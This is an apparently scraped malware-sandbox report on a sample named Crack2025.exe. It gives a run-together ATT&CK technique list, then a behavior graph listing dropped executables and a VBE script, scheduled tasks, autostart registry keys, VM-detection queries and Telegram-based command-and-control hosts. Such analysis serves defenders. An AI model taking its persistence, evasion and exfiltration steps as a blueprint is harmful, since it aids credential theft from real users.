                          Application Layer Protocol                          		Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          File Deletion                          		Cached Domain Credentials251
                          Virtualization/Sandbox Evasion                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items131
                          Masquerading                          		DCSync1
                          Application Window Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job251
                          Virtualization/Sandbox Evasion                          		Proc Filesystem1
                          System Network Configuration Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                          Process Injection                          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1639972 Sample: Crack2025.exe Startdate: 16/03/2025 Architecture: WINDOWS Score: 100 61 api.telegram.org 2->61 63 009383cm.nyashk.ru 2->63 65 ipinfo.io 2->65 73 Suricata IDS alerts for network traffic 2->73 75 Antivirus detection for dropped file 2->75 77 Multi AV Scanner detection for dropped file 2->77 81 12 other signatures 2->81 11 Crack2025.exe 3 6 2->11         started        14 xP1x1VNeIAPjWsHHYbBFNFY.exe 3 2->14         started        17 aePhPQ5epIOPbGayHv.exe 2->17         started        19 5 other processes 2->19 signatures3 79 Uses the Telegram API (likely for C&C communication) 61->79 process4 file5 49 C:\Crtsvc\ComComponentRuntimeMonitor.exe, PE32 11->49 dropped 51 C:\Crtsvc\4ATaaGAsjCFOWm7aY5r6I.vbe, data 11->51 dropped 21 wscript.exe 1 11->21         started        97 Antivirus detection for dropped file 14->97 99 Multi AV Scanner detection for dropped file 14->99 signatures6 process7 signatures8 83 Windows Scripting host queries suspicious COM object (likely to drop second stage) 21->83 24 cmd.exe 1 21->24         started        process9 process10 26 ComComponentRuntimeMonitor.exe 29 30 24->26         started        31 conhost.exe 24->31         started        dnsIp11 67 api.telegram.org 149.154.167.220, 443, 49728, 49740 TELEGRAMRU United Kingdom 26->67 69 ipinfo.io 34.117.59.81, 443, 49724, 49725 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 26->69 53 C:\Windows\...\xP1x1VNeIAPjWsHHYbBFNFY.exe, PE32 26->53 dropped 55 C:\Users\user\Desktop\tvkLaiES.log, PE32 26->55 dropped 57 C:\Users\user\Desktop\kMRvrGzk.log, PE32 26->57 dropped 59 11 other malicious files 26->59 dropped 85 Antivirus detection for dropped file 26->85 87 Multi AV Scanner detection for dropped file 26->87 89 Creates an undocumented autostart registry key 26->89 95 4 other signatures 26->95 33 csc.exe 4 26->33         started        37 schtasks.exe 26->37         started        39 schtasks.exe 26->39         started        41 16 other processes 26->41 91 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 31->91 93 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 31->93 file12 signatures13 process14 file15 47 C:\Windows\...\SecurityHealthSystray.exe, PE32 33->47 dropped 71 Infects executable files (exe, dll, sys, html) 33->71 43 conhost.exe 33->43         started        45 cvtres.exe 1 33->45         started        signatures16 process17

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.